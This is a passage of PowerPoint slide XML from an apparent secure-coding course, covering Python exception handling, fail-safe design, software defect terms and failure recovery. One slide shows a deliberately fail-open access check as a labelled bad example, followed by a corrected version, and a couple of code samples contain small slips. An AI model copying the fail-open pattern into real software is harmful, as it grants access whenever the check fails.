            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   		x = 1/0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	except (ZeroDivisionError, ValueError):     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   		print('ZeroDivisionError or ValueError is raised') </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	except:     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   		print('Something else went wrong') </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Optional else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>try:     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   		x = 1/1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	except:     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   		print('Something went wrong') </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	else:     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   		print('Nothing went wrong')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{814CB658-DDD7-4970-852F-D1897CEB03DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error Handling (Slide 2 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3559293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3877-4047-497A-B62A-295D8F97BA29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73ECCD43-D9BE-4315-85C8-678E041B9BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Optional finally:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>try:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   		f = open('somefile.txt')  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   		print(f.read()) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	except:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   		print('Something went wrong’) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	finally:  f. close()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{814CB658-DDD7-4970-852F-D1897CEB03DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error Handling (Slide 3 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3761718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63F523-912F-410C-9DC0-D829FFCABC5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{934A1127-CBDC-4F46-A538-BE43946CDAAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A fail-safe system ensures that after a failure, the system is in the least harmful (or most secure) state for the data, the user, and anything else affected by the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A bad example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if (IsAccessAllowed( ) == -1) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // Inform user that access is denied here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // Allow user to do something here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>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a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IsAccessAllowed function returns:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 if the current user is allowed access to a particular service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-1 if the user is not allowed access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0 if the function fails</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the function fails, the user would be allowed access. In this case, the function call would fail to the unsafe or more open result (allowing access).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Improved example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if (IsAccessAllowed( ) == 1) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // Allow user to do something here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // Inform user that access is denied here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81373DD0-772E-41E3-956B-08357DEC29BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fail-Safe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3484931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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="7125675" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just as software has a lifecycle, so do software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>defects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security failures after software release can be traced back to errors in design and development.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Terms that describe software problems correspond to phases of the development process. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—A mistake that someone makes when producing software (during design, programming, installation, configuration).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Fault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—An error manifested within code. When you can point </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to a problem area in code that is leading to a security problem (a bug), </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>you are identifying the fault.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Defect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—A deviation from requirements (resulting from a fault)—when something doesn't work the way it should, or doesn't live up to quality requirements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Failure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—A real-world problem that occurs when a defect is released to customers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Defects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for bug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291861">
            <a:off x="7020785" y="3251466"/>
            <a:ext cx="515788" cy="493840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="1397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bug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367002">
            <a:off x="7476461" y="3829045"/>
            <a:ext cx="540694" cy="517686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="1397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Image result for bug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437455">
            <a:off x="8621476" y="3815694"/>
            <a:ext cx="540694" cy="517686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="1397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2" descr="Image result for bug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547864">
            <a:off x="7991125" y="3318741"/>
            <a:ext cx="540694" cy="517686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="1397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009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407978-F55C-4F5D-91D1-F5B4BEA4033C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCBDCA1E-4B9A-47AC-ADB7-C5ED8C36718E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Failure Recovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1CD9C6F-CEFD-4290-9E4C-527CB7E375BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Calls to the operating system, libraries, services, and APIs may return a value that indicates whether the call succeeded or failed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check return values that identify whether the call succeeded or failed, and respond appropriately. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a failure occurred due to a specific reason that you can recover from, write code to recover from it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the call failed and the program can't recover, then:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log the return value and cleanly terminate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure your software breaks sessions, deletes temporary files, and destroys any other resources that might be used by an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When you write code to recover from a failure:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You might program the software to retry the operation after a certain period of time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that your code won't be put into an endless looping cycle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Eventually, the operation should time out and fail in a secure way that releases resources.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2919448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3DBC0-73C4-4066-8E97-26C73CF01EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
